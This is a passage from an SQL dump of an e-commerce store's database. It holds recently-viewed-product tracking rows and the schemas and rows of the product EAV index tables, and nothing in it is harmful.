(5030, 'recently_viewed_product', 6839, NULL, 2061, 1771168493),
(5031, 'recently_viewed_product', 6840, NULL, 2053, 1771168608),
(5032, 'recently_viewed_product', 6844, NULL, 2061, 1771177475),
(5033, 'recently_viewed_product', 6851, NULL, 2063, 1771200000),
(5034, 'recently_viewed_product', 6853, NULL, 2060, 1771213827),
(5035, 'recently_viewed_product', 6855, NULL, 2053, 1771219953),
(5036, 'recently_viewed_product', 6861, NULL, 2060, 1771251823),
(5037, 'recently_viewed_product', 6864, NULL, 2053, 1771253038),
(5038, 'recently_viewed_product', 6866, NULL, 2061, 1771254325),
(5039, 'recently_viewed_product', 6867, NULL, 2060, 1771200000),
(5040, 'recently_viewed_product', 6873, NULL, 2064, 1771200000),
(5041, 'recently_viewed_product', 6874, NULL, 2060, 1771283363),
(5042, 'recently_viewed_product', 6875, NULL, 2061, 1771285917),
(5043, 'recently_viewed_product', 6878, NULL, 2061, 1771296159),
(5044, 'recently_viewed_product', 6881, NULL, 2053, 1771304004),
(5045, 'recently_viewed_product', 6884, NULL, 2060, 1771305804),
(5046, 'recently_viewed_product', 6891, NULL, 2061, 1771338642),
(5047, 'recently_viewed_product', 6892, NULL, 2061, 1771286400),
(5048, 'recently_viewed_product', 6897, NULL, 2060, 1771366733),
(5049, 'recently_viewed_product', 6905, NULL, 2061, 1771407806),
(5050, 'recently_viewed_product', 6906, NULL, 2061, 1771407996),
(5051, 'recently_viewed_product', 6911, NULL, 2060, 1771428458),
(5052, 'recently_viewed_product', 6912, NULL, 2053, 1771429500),
(5053, 'recently_viewed_product', 6915, NULL, 2061, 1771444282),
(5054, 'recently_viewed_product', 6918, NULL, 2060, 1771451657),
(5055, 'recently_viewed_product', 6925, NULL, 2060, 1771487904),
(5056, 'recently_viewed_product', 6928, NULL, 2061, 1771491024),
(5057, 'recently_viewed_product', 6930, NULL, 2060, 1771498665),
(5058, 'recently_viewed_product', 6940, NULL, 2053, 1771541005),
(5059, 'recently_viewed_product', 6942, NULL, 2061, 1771543790),
(5060, 'recently_viewed_product', 6943, NULL, 2060, 1771543898),
(5061, 'recently_viewed_product', 6947, NULL, 2061, 1771558710),
(5062, 'recently_viewed_product', 6950, NULL, 2053, 1771566730),
(5063, 'recently_viewed_product', 6957, NULL, 2060, 1771595678),
(5064, 'recently_viewed_product', 6958, NULL, 2061, 1771596534),
(5065, 'recently_viewed_product', 6959, NULL, 2053, 1771597590),
(5066, 'recently_viewed_product', 6962, NULL, 2064, 1771545600),
(5067, 'recently_viewed_product', 6965, NULL, 2061, 1771622306),
(5068, 'recently_viewed_product', 6971, NULL, 2061, 1771656960),
(5069, 'recently_viewed_product', 6974, NULL, 2053, 1771658440),
(5070, 'recently_viewed_product', 6975, NULL, 2060, 1771660199),
(5071, 'recently_viewed_product', 6976, NULL, 2061, 1771670783),
(5072, 'recently_viewed_product', 6978, NULL, 2053, 1771675399),
(5073, 'recently_viewed_product', 6982, NULL, 2061, 1771693921),
(5074, 'recently_viewed_product', 6990, NULL, 2060, 1771730517),
(5075, 'recently_viewed_product', 6995, NULL, 2060, 1771749217),
(5076, 'recently_viewed_product', 6996, NULL, 2053, 1771749895),
(5077, 'recently_viewed_product', 7008, NULL, 2060, 1771809428),
(5078, 'recently_viewed_product', 7009, NULL, 2060, 1771823898),
(5079, 'recently_viewed_product', 7012, NULL, 2061, 1771828565),
(5080, 'recently_viewed_product', 7013, NULL, 2060, 1771830662),
(5081, 'recently_viewed_product', 7018, NULL, 2053, 1771842735),
(5082, 'recently_viewed_product', 7030, NULL, 2061, 1771910441),
(5083, 'recently_viewed_product', 7034, NULL, 2060, 1771921084),
(5084, 'recently_viewed_product', 7035, NULL, 2053, 1771923399),
(5085, 'recently_viewed_product', 7040, NULL, 2060, 1771958770),
(5086, 'recently_viewed_product', 7041, NULL, 2064, 1771891200),
(5087, 'recently_viewed_product', 7042, NULL, 2053, 1771968357),
(5088, 'recently_viewed_product', 7043, NULL, 2061, 1771968798),
(5089, 'recently_viewed_product', 7050, NULL, 2063, 1771988086),
(5090, 'recently_viewed_product', 7051, NULL, 2061, 1771990108),
(5091, 'recently_viewed_product', 7057, NULL, 2061, 1772029218),
(5092, 'recently_viewed_product', 7059, NULL, 2061, 1772030565),
(5093, 'recently_viewed_product', 7061, NULL, 2063, 1771977600),
(5094, 'recently_viewed_product', 7062, NULL, 2060, 1772041757),
(5095, 'recently_viewed_product', 7063, NULL, 2060, 1772046608),
(5096, 'recently_viewed_product', 7072, NULL, 2061, 1772076987),
(5097, 'recently_viewed_product', 7073, NULL, 2053, 1772077252),
(5098, 'recently_viewed_product', 7074, NULL, 2061, 1772064000),
(5099, 'recently_viewed_product', 7078, NULL, 2060, 1772104079),
(5100, 'recently_viewed_product', 7087, NULL, 2060, 1772149154),
(5101, 'recently_viewed_product', 7088, NULL, 2053, 1772150193),
(5102, 'recently_viewed_product', 7093, NULL, 2061, 1772170065),
(5103, 'recently_viewed_product', 7095, NULL, 2060, 1772171025),
(5104, 'recently_viewed_product', 7100, NULL, 2063, 1772150400),
(5105, 'recently_viewed_product', 7108, NULL, 2060, 1772226297),
(5106, 'recently_viewed_product', 7109, NULL, 2053, 1772230781),
(5107, 'recently_viewed_product', 7111, NULL, 2061, 1772231919),
(5108, 'recently_viewed_product', 7113, NULL, 2053, 1772237566),
(5109, 'recently_viewed_product', 7114, NULL, 2061, 1772238802),
(5110, 'recently_viewed_product', 7115, NULL, 2060, 1772243736),
(5111, 'recently_viewed_product', 7124, NULL, 2061, 1772236800),
(5112, 'recently_viewed_product', 7125, NULL, 2054, 1772278730),
(5113, 'recently_viewed_product', 7126, NULL, 2060, 1772279902),
(5114, 'recently_viewed_product', 7128, NULL, 2061, 1772286474),
(5115, 'recently_viewed_product', 7130, NULL, 2060, 1772290201),
(5116, 'recently_viewed_product', 7140, NULL, 2061, 1772337031),
(5117, 'recently_viewed_product', 7143, NULL, 2053, 1772353566),
(5118, 'recently_viewed_product', 7144, NULL, 2061, 1772356170),
(5119, 'recently_viewed_product', 7145, NULL, 2061, 1772357809),
(5120, 'recently_viewed_product', 7146, NULL, 2060, 1772360212),
(5121, 'recently_viewed_product', 7148, NULL, 2064, 1772323200),
(5122, 'recently_viewed_product', 7153, NULL, 2063, 1772386872),
(5123, 'recently_viewed_product', 7160, NULL, 2061, 1772423555),
(5124, 'recently_viewed_product', 7165, NULL, 2061, 1772451054),
(5125, 'recently_viewed_product', 7169, NULL, 2058, 1772455971),
(5126, 'recently_viewed_product', 7173, NULL, 2053, 1772471589),
(5127, 'recently_viewed_product', 7179, NULL, 2060, 1772516536),
(5128, 'recently_viewed_product', 7182, NULL, 2053, 1772521892),
(5129, 'recently_viewed_product', 7184, NULL, 2060, 1772530800),
(5130, 'recently_viewed_product', 7185, NULL, 2053, 1772532480),
(5131, 'recently_viewed_product', 7187, NULL, 2061, 1772550257),
(5132, 'recently_viewed_product', 7192, NULL, 2063, 1772574799),
(5133, 'recently_viewed_product', 7195, NULL, 2055, 1772575904),
(5134, 'recently_viewed_product', 7200, NULL, 2054, 1772582400),
(5135, 'recently_viewed_product', 7211, NULL, 2060, 1772646079),
(5136, 'recently_viewed_product', 7216, NULL, 2061, 1772667208),
(5137, 'recently_viewed_product', 7219, NULL, 2053, 1772681673),
(5138, 'recently_viewed_product', 7226, NULL, 2060, 1772687817),
(5139, 'recently_viewed_product', 7242, NULL, 2053, 1772729624),
(5140, 'recently_viewed_product', 7247, NULL, 2060, 1772750191),
(5141, 'recently_viewed_product', 7251, NULL, 2053, 1772762786),
(5142, 'recently_viewed_product', 7253, NULL, 2061, 1772763160),
(5143, 'recently_viewed_product', 7258, NULL, 2061, 1772775976),
(5144, 'recently_viewed_product', 7259, NULL, 2061, 1772777771),
(5145, 'recently_viewed_product', 7260, NULL, 2064, 1772755200),
(5146, 'recently_viewed_product', 7261, NULL, 2053, 1772786014),
(5147, 'recently_viewed_product', 7263, NULL, 2060, 1772801205),
(5148, 'recently_viewed_product', 7264, NULL, 2054, 1772755200),
(5149, 'recently_viewed_product', 7266, NULL, 2063, 1772755200),
(5150, 'recently_viewed_product', 7274, NULL, 2061, 1772846453),
(5151, 'recently_viewed_product', 7280, NULL, 2060, 1772873595),
(5152, 'recently_viewed_product', 7732, NULL, 2053, 1772881545);
INSERT INTO `catalog_product_frontend_action` (`action_id`, `type_id`, `visitor_id`, `customer_id`, `product_id`, `added_at`) VALUES
(5153, 'recently_viewed_product', 7733, NULL, 2060, 1772883027),
(5154, 'recently_viewed_product', 7737, NULL, 2061, 1772892909),
(5155, 'recently_viewed_product', 7741, NULL, 2061, 1772923675),
(5156, 'recently_viewed_product', 7743, NULL, 2060, 1772926398),
(5157, 'recently_viewed_product', 7744, NULL, 2053, 1772927323),
(5158, 'recently_viewed_product', 7974, NULL, 2061, 1772961291),
(5159, 'recently_viewed_product', 7975, NULL, 2060, 1772961524),
(5160, 'recently_viewed_product', 7980, NULL, 2060, 1772978911),
(5161, 'recently_viewed_product', 7981, NULL, 2061, 1772979628),
(5162, 'recently_viewed_product', 7982, NULL, 2053, 1772984101),
(5163, 'recently_viewed_product', 7992, NULL, 2061, 1773021907),
(5164, 'recently_viewed_product', 7995, NULL, 2060, 1773027473),
(5165, 'recently_viewed_product', 7997, NULL, 2061, 1773033311),
(5166, 'recently_viewed_product', 8012, NULL, 2061, 1773068831),
(5167, 'recently_viewed_product', 8013, NULL, 2060, 1773071095),
(5168, 'recently_viewed_product', 8014, NULL, 2053, 1773073142),
(5169, 'recently_viewed_product', 8017, NULL, 2055, 1773093188),
(5170, 'recently_viewed_product', 8026, NULL, 2061, 1773100800),
(5172, 'recently_viewed_product', 8031, NULL, 2060, 1773131747),
(5173, 'recently_viewed_product', 8032, NULL, 2053, 1773132183),
(5174, 'recently_viewed_product', 8043, NULL, 2061, 1773153326),
(5175, 'recently_viewed_product', 8046, NULL, 2060, 1773175944),
(5176, 'recently_viewed_product', 8050, NULL, 2060, 1773195057),
(5177, 'recently_viewed_product', 8052, NULL, 2053, 1773198942),
(5178, 'recently_viewed_product', 8053, NULL, 2061, 1773200797),
(5179, 'recently_viewed_product', 8054, NULL, 2061, 1773201017),
(5180, 'recently_viewed_product', 8055, NULL, 2053, 1773203710),
(5181, 'recently_viewed_product', 8056, NULL, 2060, 1773205036),
(5182, 'recently_viewed_product', 8059, NULL, 2061, 1773217957),
(5183, 'recently_viewed_product', 8076, NULL, 2053, 1773270985),
(5184, 'recently_viewed_product', 8084, NULL, 2061, 1773306935),
(5185, 'recently_viewed_product', 8086, NULL, 2060, 1773314485),
(5186, 'recently_viewed_product', 8089, NULL, 2061, 1773324939),
(5187, 'recently_viewed_product', 8091, NULL, 2061, 1773329961),
(5188, 'recently_viewed_product', 8107, NULL, 2060, 1773375800),
(5189, 'recently_viewed_product', 8116, NULL, 2061, 1773393497),
(5190, 'recently_viewed_product', 8119, NULL, 2053, 1773415718),
(5191, 'recently_viewed_product', 8125, NULL, 2060, 1773460206),
(5192, 'recently_viewed_product', 8126, NULL, 2053, 1773460349),
(5193, 'recently_viewed_product', 8129, NULL, 2061, 1773479405),
(5194, 'recently_viewed_product', 8130, NULL, 2053, 1773483086),
(5195, 'recently_viewed_product', 8138, NULL, 2061, 1773498472),
(5196, 'recently_viewed_product', 8139, NULL, 2053, 1773501118),
(5197, 'recently_viewed_product', 8147, NULL, 2061, 1773551242),
(5198, 'recently_viewed_product', 8149, NULL, 2060, 1773554357),
(5199, 'recently_viewed_product', 8151, NULL, 2061, 1773565851),
(5200, 'recently_viewed_product', 8160, NULL, 2053, 1773618751),
(5201, 'recently_viewed_product', 8161, NULL, 2061, 1773619186),
(5202, 'recently_viewed_product', 8162, NULL, 2058, 1773619200),
(5203, 'recently_viewed_product', 8164, NULL, 2060, 1773637452),
(5204, 'recently_viewed_product', 8177, NULL, 2060, 1773683092),
(5205, 'recently_viewed_product', 8178, NULL, 2055, 1773694914),
(5206, 'recently_viewed_product', 8180, NULL, 2061, 1773701747),
(5207, 'recently_viewed_product', 8191, NULL, 2061, 1773738294),
(5208, 'recently_viewed_product', 8192, NULL, 2053, 1773740111),
(5209, 'recently_viewed_product', 8194, NULL, 2060, 1773757331),
(5210, 'recently_viewed_product', 8201, NULL, 2060, 1773788153),
(5211, 'recently_viewed_product', 8205, NULL, 2061, 1773811486),
(5212, 'recently_viewed_product', 8207, NULL, 2060, 1773823243),
(5213, 'recently_viewed_product', 8209, NULL, 2060, 1773826411),
(5214, 'recently_viewed_product', 8212, NULL, 2060, 1773864459),
(5215, 'recently_viewed_product', 8215, NULL, 2053, 1773871274),
(5216, 'recently_viewed_product', 8218, NULL, 2060, 1773888394),
(5217, 'recently_viewed_product', 8225, NULL, 2060, 1773899274),
(5218, 'recently_viewed_product', 8231, NULL, 2061, 1773906733),
(5219, 'recently_viewed_product', 8233, NULL, 2060, 1773920963),
(5220, 'recently_viewed_product', 8234, NULL, 2061, 1773921168),
(5221, 'recently_viewed_product', 8239, NULL, 2061, 1773972715),
(5222, 'recently_viewed_product', 8241, NULL, 2053, 1773985538),
(5223, 'recently_viewed_product', 8242, NULL, 2061, 1773987905),
(5224, 'recently_viewed_product', 8250, NULL, 2053, 1774037256),
(5225, 'recently_viewed_product', 8251, NULL, 2053, 1774037371),
(5226, 'recently_viewed_product', 8252, NULL, 2061, 1774037467),
(5227, 'recently_viewed_product', 8253, NULL, 2061, 1774039151),
(5228, 'recently_viewed_product', 8257, NULL, 2061, 1774070324),
(5229, 'recently_viewed_product', 8273, NULL, 2060, 1774073938),
(5230, 'recently_viewed_product', 8280, NULL, 2060, 1774122922),
(5231, 'recently_viewed_product', 8281, NULL, 2060, 1774124426),
(5232, 'recently_viewed_product', 8282, NULL, 2061, 1774130657),
(5233, 'recently_viewed_product', 8283, NULL, 2053, 1774137560),
(5234, 'recently_viewed_product', 8300, NULL, 2061, 1774154406),
(5235, 'recently_viewed_product', 8301, NULL, 2060, 1774162252),
(5236, 'recently_viewed_product', 8306, NULL, 2061, 1774207445),
(5237, 'recently_viewed_product', 8307, NULL, 2064, 1774137600),
(5238, 'recently_viewed_product', 8308, NULL, 2061, 1774222035),
(5239, 'recently_viewed_product', 8310, NULL, 2060, 1774236967),
(5240, 'recently_viewed_product', 8313, NULL, 2053, 1774246474),
(5241, 'recently_viewed_product', 8314, NULL, 2061, 1774246617),
(5242, 'recently_viewed_product', 8319, NULL, 2061, 1774261836),
(5243, 'recently_viewed_product', 8321, NULL, 2060, 1774262819),
(5244, 'recently_viewed_product', 8333, NULL, 2061, 1774288076),
(5245, 'recently_viewed_product', 8337, NULL, 2061, 1774310195),
(5246, 'recently_viewed_product', 8339, NULL, 2060, 1774312305),
(5247, 'recently_viewed_product', 8342, NULL, 2053, 1774337524),
(5248, 'recently_viewed_product', 8343, NULL, 2060, 1774341984),
(5249, 'recently_viewed_product', 8345, NULL, 2060, 1774362324),
(5250, 'recently_viewed_product', 8347, NULL, 2061, 1774366061),
(5251, 'recently_viewed_product', 8353, NULL, 2061, 1774394883),
(5252, 'recently_viewed_product', 8354, NULL, 2053, 1774397032),
(5253, 'recently_viewed_product', 8355, NULL, 2060, 1774397382),
(5255, 'recently_viewed_product', 8359, NULL, 2061, 1774396800),
(5256, 'recently_viewed_product', 8593, NULL, 2060, 1774439756),
(5257, 'recently_viewed_product', 8594, NULL, 2060, 1774439903),
(5258, 'recently_viewed_product', 8596, NULL, 2053, 1774459862),
(5259, 'recently_viewed_product', 8597, NULL, 2061, 1774465465),
(5260, 'recently_viewed_product', 8603, NULL, 2053, 1774471441),
(5261, 'recently_viewed_product', 8609, NULL, 2064, 1774506522),
(5262, 'recently_viewed_product', 8617, NULL, 2061, 1774567040),
(5263, 'recently_viewed_product', 8619, NULL, 2060, 1774575211),
(5264, 'recently_viewed_product', 8622, NULL, 2061, 1774592124),
(5265, 'recently_viewed_product', 8624, NULL, 2053, 1774609893),
(5266, 'recently_viewed_product', 8627, NULL, 2060, 1774618401),
(5267, 'recently_viewed_product', 8630, NULL, 2064, 1774569600),
(5268, 'recently_viewed_product', 8632, NULL, 2061, 1774643310),
(5269, 'recently_viewed_product', 8651, NULL, 2061, 1774706095),
(5270, 'recently_viewed_product', 8652, NULL, 2060, 1774706624),
(5271, 'recently_viewed_product', 8657, NULL, 2061, 1774731237),
(5272, 'recently_viewed_product', 8659, NULL, 2060, 1774738809),
(5273, 'recently_viewed_product', 8663, NULL, 2060, 1774753440),
(5274, 'recently_viewed_product', 8664, NULL, 2053, 1774761267),
(5275, 'recently_viewed_product', 8666, NULL, 2061, 1774761494),
(5276, 'recently_viewed_product', 8670, NULL, 2060, 1774774586),
(5277, 'recently_viewed_product', 8675, NULL, 2053, 1774790037),
(5278, 'recently_viewed_product', 8676, NULL, 2061, 1774800878),
(5279, 'recently_viewed_product', 8685, NULL, 2061, 1774867232),
(5280, 'recently_viewed_product', 8689, NULL, 2060, 1774889327),
(5281, 'recently_viewed_product', 8691, NULL, 2060, 1774896913),
(5282, 'recently_viewed_product', 8711, NULL, 2054, 1774915200),
(5283, 'recently_viewed_product', 8714, NULL, 2060, 1775011423),
(5284, 'recently_viewed_product', 8715, NULL, 2064, 1775001600),
(5285, 'recently_viewed_product', 8716, NULL, 2054, 1775001600),
(5286, 'recently_viewed_product', 8729, NULL, 2060, 1775122224),
(5287, 'recently_viewed_product', 8730, NULL, 2054, 1775088000),
(5288, 'recently_viewed_product', 8732, NULL, 2060, 1775139269),
(5289, 'recently_viewed_product', 8742, NULL, 2055, 1775088000),
(5290, 'recently_viewed_product', 8753, NULL, 2060, 1775201092),
(5291, 'recently_viewed_product', 8754, NULL, 2059, 1775174400),
(5292, 'recently_viewed_product', 8755, NULL, 2055, 1775174400),
(5293, 'recently_viewed_product', 8771, NULL, 2059, 1775260800),
(5294, 'recently_viewed_product', 8772, NULL, 2059, 1775260800),
(5295, 'recently_viewed_product', 8773, NULL, 2063, 1775260800),
(5296, 'recently_viewed_product', 8775, NULL, 2063, 1775260800),
(5297, 'recently_viewed_product', 8776, NULL, 2055, 1775260800),
(5298, 'recently_viewed_product', 8786, NULL, 2063, 1775260800),
(5299, 'recently_viewed_product', 8787, NULL, 2055, 1775347200),
(5300, 'recently_viewed_product', 8792, NULL, 2064, 1775347200),
(5301, 'recently_viewed_product', 8793, NULL, 2055, 1775347200),
(5302, 'recently_viewed_product', 9036, NULL, 2063, 1775433600),
(5303, 'recently_viewed_product', 9045, NULL, 2060, 1775459016),
(5304, 'recently_viewed_product', 9046, NULL, 2058, 1775463183),
(5305, 'recently_viewed_product', 9047, NULL, 2062, 1775463187),
(5306, 'recently_viewed_product', 9048, NULL, 2060, 1775463423),
(5307, 'recently_viewed_product', 9049, NULL, 2059, 1775433600),
(5308, 'recently_viewed_product', 9050, NULL, 2058, 1775471086),
(5309, 'recently_viewed_product', 9051, NULL, 2062, 1775471328),
(5310, 'recently_viewed_product', 9052, NULL, 2060, 1775471807),
(5311, 'recently_viewed_product', 9056, NULL, 2058, 1775477304),
(5312, 'recently_viewed_product', 9055, NULL, 2062, 1775477304),
(5313, 'recently_viewed_product', 9057, NULL, 2060, 1775477543),
(5314, 'recently_viewed_product', 9065, NULL, 2061, 1775520000),
(5315, 'recently_viewed_product', 9092, NULL, 2063, 1775606400),
(5316, 'recently_viewed_product', 9094, NULL, 2055, 1775606400),
(5317, 'recently_viewed_product', 9109, NULL, 2064, 1775692800),
(5318, 'recently_viewed_product', 9113, NULL, 2054, 1775692800),
(5319, 'recently_viewed_product', 9120, NULL, 2054, 1775779200),
(5320, 'recently_viewed_product', 9130, NULL, 2059, 1775779200),
(5321, 'recently_viewed_product', 9185, NULL, 2064, 1776038400),
(5322, 'recently_viewed_product', 9186, NULL, 2064, 1776038400),
(5323, 'recently_viewed_product', 9188, NULL, 2061, 1776116567),
(5324, 'recently_viewed_product', 9192, NULL, 2063, 1776124800),
(5325, 'recently_viewed_product', 9203, NULL, 2063, 1776124800),
(5326, 'recently_viewed_product', 9204, NULL, 2064, 1776124800),
(5327, 'recently_viewed_product', 9205, NULL, 2054, 1776189802),
(5328, 'recently_viewed_product', 9222, NULL, 2062, 1776211200),
(5329, 'recently_viewed_product', 9230, NULL, 2055, 1776297600),
(5330, 'recently_viewed_product', 9235, NULL, 2064, 1776297600),
(5331, 'recently_viewed_product', 9239, NULL, 2064, 1776403894),
(5332, 'recently_viewed_product', 9242, NULL, 2064, 1776384000),
(5333, 'recently_viewed_product', 9246, NULL, 2058, 1776384000),
(5334, 'recently_viewed_product', 9247, NULL, 2060, 1776384000),
(5335, 'recently_viewed_product', 9255, NULL, 2063, 1776466791),
(5336, 'recently_viewed_product', 9256, NULL, 2055, 1776467169),
(5337, 'recently_viewed_product', 9257, NULL, 2060, 1776384000),
(5338, 'recently_viewed_product', 9259, NULL, 2062, 1776384000),
(5339, 'recently_viewed_product', 9260, NULL, 2058, 1776470400),
(5340, 'recently_viewed_product', 9281, NULL, 2060, 1776538976),
(5341, 'recently_viewed_product', 9282, NULL, 2058, 1776546236),
(5342, 'recently_viewed_product', 9292, NULL, 2064, 1776577497),
(5343, 'recently_viewed_product', 9293, NULL, 2064, 1776577496),
(5344, 'recently_viewed_product', 9296, NULL, 2064, 1776556800),
(5345, 'recently_viewed_product', 9334, NULL, 2061, 1776808518),
(5346, 'recently_viewed_product', 9335, NULL, 2061, 1776729600),
(5347, 'recently_viewed_product', 9381, NULL, 2058, 1776988800),
(5348, 'recently_viewed_product', 9616, NULL, 2064, 1777161600),
(5349, 'recently_viewed_product', 9624, NULL, 2064, 1777161600),
(5350, 'recently_viewed_product', 9777, NULL, 2062, 1777852800),
(5351, 'recently_viewed_product', 9780, NULL, 2064, 1777852800),
(5352, 'recently_viewed_product', 9786, NULL, 2053, 1777940258),
(5353, 'recently_viewed_product', 9789, NULL, 2064, 1777939200),
(5354, 'recently_viewed_product', 9794, NULL, 2060, 1777990411),
(5355, 'recently_viewed_product', 9796, NULL, 2064, 1778000305),
(5356, 'recently_viewed_product', 9798, NULL, 2064, 1777939200),
(5357, 'recently_viewed_product', 9802, NULL, 2060, 1778052258),
(5358, 'recently_viewed_product', 9804, NULL, 2060, 1778070802),
(5359, 'recently_viewed_product', 9805, NULL, 2053, 1778075247),
(5360, 'recently_viewed_product', 9809, NULL, 2053, 1778107179),
(5361, 'recently_viewed_product', 9811, NULL, 2060, 1778111661),
(5362, 'recently_viewed_product', 9828, NULL, 2064, 1778198400),
(5363, 'recently_viewed_product', 9830, NULL, 2053, 1778290654),
(5364, 'recently_viewed_product', 9831, NULL, 2060, 1778292569),
(5365, 'recently_viewed_product', 9832, NULL, 2053, 1778292654),
(5366, 'recently_viewed_product', 9835, NULL, 2060, 1778323842),
(5367, 'recently_viewed_product', 9839, NULL, 2061, 1778366203),
(5368, 'recently_viewed_product', 9842, NULL, 2060, 1778382308),
(5369, 'recently_viewed_product', 9845, NULL, 2060, 1778403584),
(5370, 'recently_viewed_product', 9897, NULL, 2061, 1778453043),
(5371, 'recently_viewed_product', 9898, NULL, 2061, 1778483934),
(5372, 'recently_viewed_product', 9906, NULL, 2053, 1778543724),
(5373, 'recently_viewed_product', 9908, NULL, 2064, 1778544000);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav`
--

CREATE TABLE `catalog_product_index_eav` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` int(10) UNSIGNED NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Index Table';

--
-- Dumping data for table `catalog_product_index_eav`
--

INSERT INTO `catalog_product_index_eav` (`entity_id`, `attribute_id`, `store_id`, `value`, `source_id`) VALUES
(2053, 93, 1, 5485, 2052),
(2053, 99, 1, 1, 2052),
(2053, 99, 1, 4, 2053),
(2053, 140, 1, 5465, 2053),
(2053, 140, 1, 5577, 2053),
(2053, 140, 1, 5580, 2053),
(2053, 145, 1, 5602, 2052),
(2053, 146, 1, 0, 2053),
(2053, 147, 1, 0, 2053),
(2053, 148, 1, 1, 2053),
(2053, 149, 1, 0, 2053),
(2053, 150, 1, 0, 2053),
(2053, 152, 1, 5532, 2053),
(2053, 152, 1, 5538, 2053),
(2053, 156, 1, 5622, 2053),
(2053, 157, 1, 5632, 2053),
(2053, 157, 1, 5635, 2053),
(2053, 157, 1, 5638, 2053),
(2054, 99, 1, 4, 2054),
(2055, 99, 1, 4, 2055),
(2057, 99, 1, 4, 2057),
(2058, 99, 1, 4, 2058),
(2059, 99, 1, 4, 2059),
(2060, 99, 1, 4, 2060),
(2061, 99, 1, 4, 2061),
(2062, 99, 1, 4, 2062),
(2063, 99, 1, 4, 2063),
(2064, 93, 1, 5476, 2064),
(2064, 99, 1, 4, 2064),
(2064, 145, 1, 5518, 2064),
(2064, 146, 1, 0, 2064),
(2064, 147, 1, 0, 2064),
(2064, 148, 1, 0, 2064),
(2064, 149, 1, 0, 2064),
(2064, 150, 1, 0, 2064);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_decimal`
--

CREATE TABLE `catalog_product_index_eav_decimal` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` decimal(12,4) NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Decimal Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_decimal_idx`
--

CREATE TABLE `catalog_product_index_eav_decimal_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` decimal(12,4) NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Decimal Indexer Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_decimal_replica`
--

CREATE TABLE `catalog_product_index_eav_decimal_replica` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` decimal(12,4) NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Decimal Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_decimal_tmp`
--

CREATE TABLE `catalog_product_index_eav_decimal_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` decimal(12,4) NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Decimal Indexer Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_idx`
--

CREATE TABLE `catalog_product_index_eav_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` int(10) UNSIGNED NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Indexer Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_replica`
--

CREATE TABLE `catalog_product_index_eav_replica` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` int(10) UNSIGNED NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Index Table';

--
-- Dumping data for table `catalog_product_index_eav_replica`
--

INSERT INTO `catalog_product_index_eav_replica` (`entity_id`, `attribute_id`, `store_id`, `value`, `source_id`) VALUES
(2053, 93, 1, 5485, 2052),
(2053, 99, 1, 1, 2052),
(2053, 99, 1, 4, 2053),
(2053, 140, 1, 5465, 2053),
(2053, 140, 1, 5577, 2053),
(2053, 140, 1, 5580, 2053),
(2053, 145, 1, 5602, 2052),
(2053, 146, 1, 0, 2053),
(2053, 147, 1, 0, 2053),
(2053, 148, 1, 1, 2053),
(2053, 149, 1, 0, 2053),
(2053, 150, 1, 0, 2053),
